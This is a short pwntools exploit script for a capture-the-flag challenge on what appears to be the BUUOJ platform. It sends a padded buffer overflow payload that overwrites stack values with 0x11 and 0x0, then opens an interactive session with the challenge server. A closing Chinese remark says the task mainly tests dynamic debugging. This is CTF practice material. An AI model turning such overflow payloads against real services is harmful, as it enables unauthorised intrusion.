exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    #arch ='amd64',
    arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
#libc = ELF("")
io = remote("node4.buuoj.cn",29991)
def debug():
    gdb.attach(io,'b main')
    pause()
#code here
#debug()
io.sendline(b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaa'+p32(0x11)+p32(0x0)+b'paaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa')
io.interactive()

这题主要考一个动态调参的过程 不难